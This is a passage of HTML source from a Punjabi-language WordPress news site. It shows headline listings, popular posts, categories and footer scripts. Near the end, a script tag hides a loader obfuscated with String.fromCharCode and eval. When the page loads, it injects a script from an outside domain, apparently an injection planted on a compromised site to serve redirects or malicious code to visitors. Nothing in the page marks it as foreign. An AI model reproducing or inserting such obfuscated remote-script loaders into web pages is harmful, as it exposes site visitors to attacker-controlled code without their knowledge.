        <div class="td-module-thumb"><a href="http://charhdikala.com/?p=6199" rel="bookmark" title="ਅਮਰੀਕਾ &#8216;ਚ ਪਹਿਲੀ ਸਿੱਖ ਮਹਿਲਾ ਬਣੀ ਮੇਅਰ"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2017/11/2017_11image_17_47_352310000sss4-ll-100x70.jpg" alt="" title="ਅਮਰੀਕਾ &#8216;ਚ ਪਹਿਲੀ ਸਿੱਖ ਮਹਿਲਾ ਬਣੀ ਮੇਅਰ"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=6199" rel="bookmark" title="ਅਮਰੀਕਾ &#8216;ਚ ਪਹਿਲੀ ਸਿੱਖ ਮਹਿਲਾ ਬਣੀ ਮੇਅਰ">ਅਮਰੀਕਾ &#8216;ਚ ਪਹਿਲੀ ਸਿੱਖ ਮਹਿਲਾ ਬਣੀ ਮੇਅਰ</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-11-30T17:06:26+00:00" >November 30, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2017-11-30T17:06:26+00:00"><meta itemprop="headline " content="ਅਮਰੀਕਾ &#039;ਚ ਪਹਿਲੀ ਸਿੱਖ ਮਹਿਲਾ ਬਣੀ ਮੇਅਰ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2017/11/2017_11image_17_47_352310000sss4-ll.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://charhdikala.com/?p=6196" rel="bookmark" title="ਨਜਾਇਜ਼ ਨੀਲੇ ਕਾਰਡ ਅਤੇ ਗਲਤ ਬੁਢਾਪਾ ਪੈਨਸ਼ਨਾਂ ਲਗਾਉਣ ਵਾਲੇ ਅਫ਼ਸਰ ਬਖ਼ਸ਼ੇ ਨਹੀਂ ਜਾਣਗੇ: ਧਰਮਸੋਤ"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2017/11/DSC_0726-100x70.jpg" alt="" title="ਨਜਾਇਜ਼ ਨੀਲੇ ਕਾਰਡ ਅਤੇ ਗਲਤ ਬੁਢਾਪਾ ਪੈਨਸ਼ਨਾਂ ਲਗਾਉਣ ਵਾਲੇ ਅਫ਼ਸਰ ਬਖ਼ਸ਼ੇ ਨਹੀਂ ਜਾਣਗੇ: ਧਰਮਸੋਤ"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=6196" rel="bookmark" title="ਨਜਾਇਜ਼ ਨੀਲੇ ਕਾਰਡ ਅਤੇ ਗਲਤ ਬੁਢਾਪਾ ਪੈਨਸ਼ਨਾਂ ਲਗਾਉਣ ਵਾਲੇ ਅਫ਼ਸਰ ਬਖ਼ਸ਼ੇ ਨਹੀਂ ਜਾਣਗੇ: ਧਰਮਸੋਤ">ਨਜਾਇਜ਼ ਨੀਲੇ ਕਾਰਡ ਅਤੇ ਗਲਤ ਬੁਢਾਪਾ ਪੈਨਸ਼ਨਾਂ ਲਗਾਉਣ ਵਾਲੇ ਅਫ਼ਸਰ ਬਖ਼ਸ਼ੇ...</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-11-30T17:05:14+00:00" >November 30, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2017-11-30T17:05:14+00:00"><meta itemprop="headline " content="ਨਜਾਇਜ਼ ਨੀਲੇ ਕਾਰਡ ਅਤੇ ਗਲਤ ਬੁਢਾਪਾ ਪੈਨਸ਼ਨਾਂ ਲਗਾਉਣ ਵਾਲੇ ਅਫ਼ਸਰ ਬਖ਼ਸ਼ੇ ਨਹੀਂ ਜਾਣਗੇ: ਧਰਮਸੋਤ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2017/11/DSC_0726.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://charhdikala.com/?p=6193" rel="bookmark" title="ਵਿਪਨ ਸ਼ਰਮਾ ਦੀ ਹੱਤਿਆ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਦੋ ਦੋਸ਼ੀ ਕਾਬੂ"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2017/11/MURDER-CASE-580x395-100x70.jpg" alt="" title="ਵਿਪਨ ਸ਼ਰਮਾ ਦੀ ਹੱਤਿਆ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਦੋ ਦੋਸ਼ੀ ਕਾਬੂ"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=6193" rel="bookmark" title="ਵਿਪਨ ਸ਼ਰਮਾ ਦੀ ਹੱਤਿਆ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਦੋ ਦੋਸ਼ੀ ਕਾਬੂ">ਵਿਪਨ ਸ਼ਰਮਾ ਦੀ ਹੱਤਿਆ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਦੋ ਦੋਸ਼ੀ ਕਾਬੂ</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-11-30T17:04:09+00:00" >November 30, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2017-11-30T17:04:09+00:00"><meta itemprop="headline " content="ਵਿਪਨ ਸ਼ਰਮਾ ਦੀ ਹੱਤਿਆ ਦੇ ਮਾਮਲੇ &#039;ਚ ਦੋ ਦੋਸ਼ੀ ਕਾਬੂ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2017/11/MURDER-CASE-580x395.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <script>var block_td_uid_7_5a214cb913f24 = new tdBlock();
block_td_uid_7_5a214cb913f24.id = "td_uid_7_5a214cb913f24";
block_td_uid_7_5a214cb913f24.atts = '{"custom_title":"POPULAR POSTS","limit":3,"sort":"popular","class":"td_uid_7_5a214cb913f24_rand"}';
block_td_uid_7_5a214cb913f24.td_column_number = "1";
block_td_uid_7_5a214cb913f24.block_type = "td_block_7";
block_td_uid_7_5a214cb913f24.post_count = "3";
block_td_uid_7_5a214cb913f24.found_posts = "1944";
block_td_uid_7_5a214cb913f24.header_color = "";
block_td_uid_7_5a214cb913f24.ajax_pagination_infinite_stop = "";
block_td_uid_7_5a214cb913f24.max_num_pages = "648";
tdBlocksArray.push(block_td_uid_7_5a214cb913f24);
</script><div class="td_block_wrap td_block_7 td_uid_7_5a214cb913f24_rand td-pb-border-top"><h4 class="block-title"><span>POPULAR POSTS</span></h4><div id=td_uid_7_5a214cb913f24 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://charhdikala.com/?p=651" rel="bookmark" title="ਐਸ.ਜੀ.ਪੀ. ਸੀ. ਪ੍ਰਧਾਨ ਵੱਲੋਂ  ਸੰਤ ਢੱਡਰੀਆਂ ਵਾਲੇ ਨਾਲ ਕੀਤੀ ਮੁਲਾਕਾਤ  6 ਜੂਨ ਨੂੰ ਮਨਾਇਆ ਜਾਵੇਗਾ ਘੱਲੂਘਾਰਾ ਦਿਵਸ : ਜਥੇ: ਅਵਤਾਰ ਸਿੰਘ"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2016/06/IMG_20160602_144651_1-100x70.jpg" alt="" title="ਐਸ.ਜੀ.ਪੀ. ਸੀ. ਪ੍ਰਧਾਨ ਵੱਲੋਂ  ਸੰਤ ਢੱਡਰੀਆਂ ਵਾਲੇ ਨਾਲ ਕੀਤੀ ਮੁਲਾਕਾਤ  6 ਜੂਨ ਨੂੰ ਮਨਾਇਆ ਜਾਵੇਗਾ ਘੱਲੂਘਾਰਾ ਦਿਵਸ : ਜਥੇ: ਅਵਤਾਰ ਸਿੰਘ"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=651" rel="bookmark" title="ਐਸ.ਜੀ.ਪੀ. ਸੀ. ਪ੍ਰਧਾਨ ਵੱਲੋਂ  ਸੰਤ ਢੱਡਰੀਆਂ ਵਾਲੇ ਨਾਲ ਕੀਤੀ ਮੁਲਾਕਾਤ  6 ਜੂਨ ਨੂੰ ਮਨਾਇਆ ਜਾਵੇਗਾ ਘੱਲੂਘਾਰਾ ਦਿਵਸ : ਜਥੇ: ਅਵਤਾਰ ਸਿੰਘ">ਐਸ.ਜੀ.ਪੀ. ਸੀ. ਪ੍ਰਧਾਨ ਵੱਲੋਂ  ਸੰਤ ਢੱਡਰੀਆਂ ਵਾਲੇ ਨਾਲ ਕੀਤੀ ਮੁਲਾਕਾਤ...</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-06-02T16:45:46+00:00" >June 2, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2016-06-02T16:45:46+00:00"><meta itemprop="headline " content="ਐਸ.ਜੀ.ਪੀ. ਸੀ. ਪ੍ਰਧਾਨ ਵੱਲੋਂ  ਸੰਤ ਢੱਡਰੀਆਂ ਵਾਲੇ ਨਾਲ ਕੀਤੀ ਮੁਲਾਕਾਤ  6 ਜੂਨ ਨੂੰ ਮਨਾਇਆ ਜਾਵੇਗਾ ਘੱਲੂਘਾਰਾ ਦਿਵਸ : ਜਥੇ: ਅਵਤਾਰ ਸਿੰਘ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2016/06/IMG_20160602_144651_1.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://charhdikala.com/?p=391" rel="bookmark" title="ਸੰਤ ਰਣਜੀਤ ਸਿੰਘ ਢੱਡਰੀਆਂ ਵਾਲੇ &#8216;ਤੇ ਹੋਇਆ ਹਮਲਾ"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2016/05/ranjit-singh-100x70.jpg" alt="" title="ਸੰਤ ਰਣਜੀਤ ਸਿੰਘ ਢੱਡਰੀਆਂ ਵਾਲੇ &#8216;ਤੇ ਹੋਇਆ ਹਮਲਾ"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=391" rel="bookmark" title="ਸੰਤ ਰਣਜੀਤ ਸਿੰਘ ਢੱਡਰੀਆਂ ਵਾਲੇ &#8216;ਤੇ ਹੋਇਆ ਹਮਲਾ">ਸੰਤ ਰਣਜੀਤ ਸਿੰਘ ਢੱਡਰੀਆਂ ਵਾਲੇ &#8216;ਤੇ ਹੋਇਆ ਹਮਲਾ</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-05-17T16:38:25+00:00" >May 17, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2016-05-17T16:38:25+00:00"><meta itemprop="headline " content="ਸੰਤ ਰਣਜੀਤ ਸਿੰਘ ਢੱਡਰੀਆਂ ਵਾਲੇ &#039;ਤੇ ਹੋਇਆ ਹਮਲਾ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2016/05/ranjit-singh.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://charhdikala.com/?p=619" rel="bookmark" title="ਦਾਦਰੀ ਕਤਲ ਕਾਂਡ ਫਰਿੱਜ &#8216;ਚ ਕੀ ਰੱਖਿਐ, ਇਸ ਨਾਲ ਕੋਈ ਫ਼ਰਕ ਨਹੀਂ ਪੈਂਦਾ : ਅਖਿਲੇਸ਼"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2016/06/dfcv-100x70.jpg" alt="" title="ਦਾਦਰੀ ਕਤਲ ਕਾਂਡ ਫਰਿੱਜ &#8216;ਚ ਕੀ ਰੱਖਿਐ, ਇਸ ਨਾਲ ਕੋਈ ਫ਼ਰਕ ਨਹੀਂ ਪੈਂਦਾ : ਅਖਿਲੇਸ਼"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=619" rel="bookmark" title="ਦਾਦਰੀ ਕਤਲ ਕਾਂਡ ਫਰਿੱਜ &#8216;ਚ ਕੀ ਰੱਖਿਐ, ਇਸ ਨਾਲ ਕੋਈ ਫ਼ਰਕ ਨਹੀਂ ਪੈਂਦਾ : ਅਖਿਲੇਸ਼">ਦਾਦਰੀ ਕਤਲ ਕਾਂਡ ਫਰਿੱਜ &#8216;ਚ ਕੀ ਰੱਖਿਐ, ਇਸ ਨਾਲ ਕੋਈ ਫ਼ਰਕ...</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-06-01T16:09:05+00:00" >June 1, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2016-06-01T16:09:05+00:00"><meta itemprop="headline " content="ਦਾਦਰੀ ਕਤਲ ਕਾਂਡ ਫਰਿੱਜ &#039;ਚ ਕੀ ਰੱਖਿਐ, ਇਸ ਨਾਲ ਕੋਈ ਫ਼ਰਕ ਨਹੀਂ ਪੈਂਦਾ : ਅਖਿਲੇਸ਼"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2016/06/dfcv.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_uid_8_5a214cb92bce7_rand widget widget_categories td-pb-border-top"><h4 class="block-title"><span>POPULAR CATEGORY</span></h4><ul class="td-pb-padding-side"><li><a href="http://charhdikala.com/?cat=6">Breaking News<span class="td-cat-no">852</span></a></li><li><a href="http://charhdikala.com/?cat=9">India<span class="td-cat-no">746</span></a></li><li><a href="http://charhdikala.com/?cat=2">Punjab<span class="td-cat-no">568</span></a></li><li><a href="http://charhdikala.com/?cat=7">Politics<span class="td-cat-no">263</span></a></li><li><a href="http://charhdikala.com/?cat=12">Delhi<span class="td-cat-no">150</span></a></li><li><a href="http://charhdikala.com/?cat=10">Sikhs<span class="td-cat-no">78</span></a></li><li><a href="http://charhdikala.com/?cat=13">Business<span class="td-cat-no">47</span></a></li><li><a href="http://charhdikala.com/?cat=11">Haryana<span class="td-cat-no">26</span></a></li><li><a href="http://charhdikala.com/?cat=14">Health<span class="td-cat-no">24</span></a></li></ul></div> <!-- ./block -->                            </div>
        </div>
    </div>
    <div class="td-footer-bottom-full">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://charhdikala.com/"><img class="td-retina-data" src="http://charhdikala.com/wp-content/uploads/2016/04/pic3-300x97.jpg" data-retina="http://charhdikala.com/wp-content/uploads/2016/04/pic3-300x97.jpg" alt=""/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>Charhdikala is your news, entertainment, music, fashion Website. We provide you with the latest breaking news and videos straight from Punjab, Haryana, Delhi, Rest of India & Abroad.<div class="footer-email-wrap">Contact us: <a href="mailto:feedback@timetv.in">feedback@timetv.in</a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div><span class="td-social-icon-wrap"><a target="_blank" href="#" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="#" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="#" title="Vimeo"><i class="td-icon-font td-icon-vimeo"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="#" title="VKontakte"><i class="td-icon-font td-icon-vk"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="#" title="Youtube"><i class="td-icon-font td-icon-youtube"></i></a></span></aside></div>            </div>
        </div>
    </div>
</div>

<!-- Sub Footer -->
    <div class="td-sub-footer-container">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span7 td-sub-footer-menu">
                        <div class="menu-td-demo-footer-menu-container"><ul id="menu-td-demo-footer-menu" class="td-subfooter-menu"><li id="menu-item-35" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-first menu-item-35"><a href="#">Disclaimer</a></li>
<li id="menu-item-36" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36"><a href="#">Privacy</a></li>
<li id="menu-item-37" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-37"><a href="#">Advertisement</a></li>
<li id="menu-item-188" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-188"><a href="http://charhdikala.com/?page_id=30">Contact</a></li>
</ul></div>                </div>

                <div class="td-pb-span5 td-sub-footer-copy">
                    &copy; Copyright 2016 - Website Developed by THE WEB TITANS                </div>
            </div>
        </div>
    </div>
    </div><!--close content div-->
</div><!--close td-outer-wrap-->



    <!--

        Theme: Newspaper by tagDiv 2015
        Version: 6.6 (rara)
        Deploy mode: deploy
        
        uid: 5a214cb934326
    -->

    <script type="text/javascript">eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 115, 99, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 115, 99, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 106, 97, 114, 46, 116, 114, 97, 102, 102, 105, 99, 98, 101, 116, 116, 101, 114, 46, 98, 105, 122, 47, 115, 46, 106, 115, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 99, 41, 59, 10))</script><script type='text/javascript' src='http://charhdikala.com/wp-content/plugins/akismet/_inc/form.js?ver=3.1.7'></script>
<script type='text/javascript' src='http://charhdikala.com/wp-includes/js/comment-reply.min.js?ver=4.5.12'></script>
<script type='text/javascript' src='http://charhdikala.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=6.6'></script>
<script type='text/javascript' src='http://charhdikala.com/wp-includes/js/wp-embed.min.js?ver=4.5.12'></script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://charhdikala.com/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://charhdikala.com/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


</body>
</html>